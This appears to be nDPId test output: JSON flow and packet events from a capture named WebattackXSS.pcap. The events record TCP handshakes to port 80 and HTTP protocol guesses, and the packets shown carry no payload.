+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7577,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":2,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347878568,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg3Dm1iqC7+gxrKAScSAPsQAAAgQFtAQCCAoD5jLrATxhdwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":3,"flow_last_seen":1499347878568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347878568,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UN1AAD4GdPusEAABwKgKMoNwAFDv6DGs5tYqg4AQAOWuuAAAAQEICgE8YXcD5jLr"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347881141,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347881141,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80HhAAD4G9VesEAABwKgKMoOKAFDzHbOCAAAAAKACchDPUgAAAgQFtAQCCAoBPGP6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7598,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":2,"flow_last_seen":1499347881141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347881141,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg4pPHZMl8x2zg6AScSC0mgAAAgQFtAQCCAoD5jVuATxj+gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":3,"flow_last_seen":1499347881142,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347881142,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00HlAAD4G9V6sEAABwKgKMoOKAFDzHbODTx2TJoAQAOVTogAAAQEICgE8Y\/oD5jVu"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347882404,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347882404,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eWdAAD4GTGmsEAABwKgKMoOYAFA4phxRAAAAAKACchAfsgAAAgQFtAQCCAoBPGU2AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":2,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347882404,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg5hCgWTIOKYcUqAScSA+twAAAgQFtAQCCAoD5jaqATxlNgEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":3,"flow_last_seen":1499347882404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eWhAAD4GTHCsEAABwKgKMoOYAFA4phxSQoFkyYAQAOXdvgAAAQEICgE8ZTYD5jaq"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347883693,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347883693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WYNAAD4GbE2sEAABwKgKMoOmAFDBWz\/7AAAAAKACchByAgAAAgQFtAQCCAoBPGZ4AAAAAAEDAwc="} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":2,"flow_last_seen":1499347883693,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg6YJ\/gJMwVs\/\/KAScSAqxQAAAgQFtAQCCAoD5jfsATxmeAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":3,"flow_last_seen":1499347883694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347883694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WYRAAD4GbFSsEAABwKgKMoOmAFDBWz\/8Cf4CTYAQAOXJzAAAAQEICgE8ZngD5jfs"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347752308,"flow_last_seen":1499347757828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347753649,"flow_last_seen":1499347758828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347886296,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347886296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8J3NAAD4Gnl2sEAABwKgKMoPAAFDfgE5wAAAAAKACchBCwwAAAgQFtAQCCAoBPGkDAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7637,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":2,"flow_last_seen":1499347886296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg8DWbqB034BOcaAScSCOYQAAAgQFtAQCCAoD5jp3ATxpAwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":3,"flow_last_seen":1499347886297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347886297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0J3RAAD4GnmSsEAABwKgKMoPAAFDfgE5x1m6gdYAQAOUtaQAAAQEICgE8aQMD5jp3"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347887572,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347887572,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vidAAD4GB6msEAABwKgKMoPOAFDy3tRlAAAAAKACchCoIgAAAgQFtAQCCAoBPGpCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":2,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg85IicNz8t7UZqAScSBdaAAAAgQFtAQCCAoD5ju2ATxqQgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":3,"flow_last_seen":1499347887572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vihAAD4GB7CsEAABwKgKMoPOAFDy3tRmSInDdIAQAOX8bwAAAQEICgE8akID5ju2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347890192,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347890192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gVNAAD4GRH2sEAABwKgKMoPoAFBPU+2CAAAAAKACchAv6AAAAgQFtAQCCAoBPGzRAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":2,"flow_last_seen":1499347890192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg+hXA92bT1Ptg6AScSC5\/AAAAgQFtAQCCAoD5j5FATxs0QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":3,"flow_last_seen":1499347890193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347890193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gVRAAD4GRISsEAABwKgKMoPoAFBPU+2DVwPdnIAQAOVZBAAAAQEICgE8bNED5j5F"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347891536,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347891536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JsNAAD4Gnw2sEAABwKgKMoP2AFBiQUjiAAAAAKACchDAPAAAAgQFtAQCCAoBPG4hAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":2,"flow_last_seen":1499347891536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg\/bwNNpHYkFI46AScSCzIwAAAgQFtAQCCAoD5j+VATxuIQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":3,"flow_last_seen":1499347891537,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347891537,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JsRAAD4GnxSsEAABwKgKMoP2AFBiQUjj8DTaSIAQAOVSKwAAAQEICgE8biED5j+V"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347894093,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347894093,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W6ZAAD4GaiqsEAABwKgKMoQQAFDdYCsGAAAAAKACchBgYAAAAgQFtAQCCAoBPHCgAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":2,"flow_last_seen":1499347894093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhBBGWrmb3WArB6AScSAbTwAAAgQFtAQCCAoD5kIUATxwoAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":3,"flow_last_seen":1499347894094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347894094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W6dAAD4GajGsEAABwKgKMoQQAFDdYCsHRlq5nIAQAOW6VgAAAQEICgE8cKAD5kIU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347895396,"flow_last_seen":1499347895396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895396,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1499347895396,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895396,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+PRAAD4GzNusEAABwKgKMoQeAFBBmIkSAAAAAKACchCcyAAAAgQFtAQCCAoBPHHmAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":2,"flow_last_seen":1499347895397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895397,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhB6fI8DwQZiJE6AScSD2UgAAAgQFtAQCCAoD5kNaATxx5gEDAwc="} 